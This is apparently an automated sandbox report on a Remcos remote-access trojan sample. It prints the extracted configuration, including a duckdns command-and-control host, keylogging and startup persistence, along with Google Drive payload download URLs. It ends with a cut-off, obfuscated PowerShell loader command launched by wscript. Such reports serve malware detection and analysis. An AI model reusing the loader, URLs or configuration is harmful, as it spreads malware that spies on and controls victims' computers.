Source: 00000007.00000002.1905132291.0000000009B28000.00000004.00000020.00020000.00000000.sdmp |
Malware Configuration Extractor: Remcos {"Host:Port:Password": "a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "Rmc-WDQFG0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"} |
Source: unknown |
HTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49705 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.8:49706 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49708 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.8:49709 version: TLS 1.2 |
Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1921976127.0000000008A50000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: m.Core.pdb4 source: powershell.exe, 00000005.00000002.1914298768.0000000007932000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ore.pdbht source: powershell.exe, 00000005.00000002.1914298768.0000000007932000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: em.Core.pdbk source: powershell.exe, 00000005.00000002.1914298768.00000000078E8000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: em.Core.pdb source: powershell.exe, 00000005.00000002.1914298768.00000000078E8000.00000004.00000020.00020000.00000000.sdmp |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /download?id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBc&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=196IYHEN42PTEDpTMlvc3osZSDWP6_3Rd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /download?id=196IYHEN42PTEDpTMlvc3osZSDWP6_3Rd&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /download?id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBc&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=196IYHEN42PTEDpTMlvc3osZSDWP6_3Rd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /download?id=196IYHEN42PTEDpTMlvc3osZSDWP6_3Rd&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive |
Source: powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000002.00000002.1583462169.0000029181C93000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000002.00000002.1610119241.0000029190071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1906272544.0000000005FD9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000005.00000002.1885917031.00000000050C8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.1583462169.0000029180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1885917031.0000000004F71000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000005.00000002.1885917031.00000000050C8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.1583462169.0000029180001000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000005.00000002.1885917031.0000000004F71000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000002.00000002.1583462169.0000029181C7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029180490000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000005.00000002.1906272544.0000000005FD9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000005.00000002.1906272544.0000000005FD9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000005.00000002.1906272544.0000000005FD9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000002.00000002.1583462169.0000029181C55000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googP2 |
Source: powershell.exe, 00000002.00000002.1583462169.0000029180227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.000002918190F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000002.00000002.1583462169.0000029180227000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBcP |
Source: powershell.exe, 00000005.00000002.1885917031.00000000050C8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBcXRul |
Source: powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googh |
Source: powershell.exe, 00000002.00000002.1583462169.0000029180494000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000002.00000002.1583462169.0000029180494000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBc&export=download |
Source: powershell.exe, 00000005.00000002.1885917031.00000000050C8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.1583462169.0000029180BE0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000002.00000002.1610119241.0000029190071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1906272544.0000000005FD9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000002.00000002.1583462169.0000029181C7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029180490000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000002.00000002.1583462169.0000029181C7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029180490000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000002.00000002.1583462169.0000029181C7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029180490000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000002.00000002.1583462169.0000029181C7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029180490000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000002.00000002.1583462169.0000029181C7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029180490000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: unknown |
Network traffic detected: HTTP traffic on port 49708 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49709 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49706 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49705 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49709 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49708 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49706 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49705 |
Source: unknown |
HTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49705 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.8:49706 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49708 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.8:49709 version: TLS 1.2 |
Source: amsi32_8088.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7756, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 8088, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Staggers Eudoxian Basilikummens Bonuspoint Tabskontoers Skallesmkkeren #>;$Lyserde='Showery';<#Lennoaceous reetableringen Retrieveren Personificerende Engladden Trkloset #>;$Paradoksal=$host.PrivateData;If ($Paradoksal) {$Veratrize++;}function Omhng120($Serranid){$Dekaterer=$Shockedness+$Serranid.Length-$Veratrize;for( $Triphosphate=5;$Triphosphate -lt $Dekaterer;$Triphosphate+=6){$Noosphere+=$Serranid[$Triphosphate];}$Noosphere;}function Stungen($Mermithergate){ . ($Psychogram) ($Mermithergate);}$Attributvrdierne=Omhng120 ' S apMTrougoK ncezStivniGen.rlSeminlKysteaIn.an/ Apof5Dr,je.Unreh0 U op Sikk (KimmeWMarbliTilb,nBr.lldNonv.o Fo,gwFo hisGenm. Kv.lN LadiTIgang Ducat1Tor j0Roeku.Schis0Mis t;C,odp NonefW PaneiFunkinTegne6Bnk v4Dripp; Eth ClywdxPerfo6 otto4Nomog;Yuruj ompharCh.fsvCykel:Unrev1 al g2Monol1Dagbo.Ersta0Janic) pole HyperG en,meMini cHeatek AlmioHu.ge/U sty2Strat0C ntr1Afko 0 U ig0ulsel1Lr.om0 Un u1 Tak DetaiFEf eriS,andrEnd.oe yltefP ukiorovsexDopin/Anemo1Os,el2di co1St,rs.Forva0Tub r ';$Odelet=Omhng120 'StenaUHomopSInveseVasofrA omv-Vejl,aReintG Sti,eDvornNAficiTEfter ';$Exaltations=Omhng120 '.ndechSv retMe,antMaoprpFeoffs Exp,: Cach/H ved/Deni dVel,frBespiiAntifvDiesee,ncau.Af tagIld uo op.aoSpildgPedomlUdrkeeGabes. X muc S.rboVrdstmska.d/Vildsu Bestc Udho?Casime.ragixStreep Suf.oPacifr Fedttacade=GroutdM ntaoGho twFyrrenCulo lrenteo.ermiaDoku d Rut & awahiHesped A li=Sytte1AquifZPseuddTalmayReshvbNobblZLygteYScala4 onunW onarRowsnMUn.omwNonh.YFac.eKEgoceb OutsuSvaleTUnderl irroGAl ebVprokuA snusN h litSlito9nertswOwlytX Nr ehFreigqImmollMe siWPrizeSGlem BBimlecSpr n ';$Christiansfeldere=Omhng120 'Optan>Rapso ';$Psychogram=Omhng120 'Cantaib odee atyrxAsymp ';$Nonexaggeration='Kassemangelens238';$Astrography='\Sternman224.Ill';Stungen (Omhng120 'A nde$Rainmg aledlNonexoForklbCountaPlettlBenzo:PadraIOpr ts.ntgetBrandaMlersnVicekdParitsAdmintW.isttStride Su lng gardDelegeSedim= Dr,b$ SnrleEntern igurvKompl: Overa Sk lpoverfpHintidproklaExuditLandsaStikb+Sharp$ inteANonhysImitatReg orBrys oT ykkgUt ovr UninaBescopT nnih ChoryAf ig ');Stungen (Omhng120 ' rnd$ tab gM,tallPreocoCondubSemita Tilfl urf:Sn ckSSingeeTricorFjerdiC,appaTricot SloseBulbil Angryv der=Lema $ AkadE lndfx TuscaHookslCobantPa deabulbitJunioiNonunoBiblinElectsUnde,. Rei,s Sc.epAdr nl ArguiMarvbt |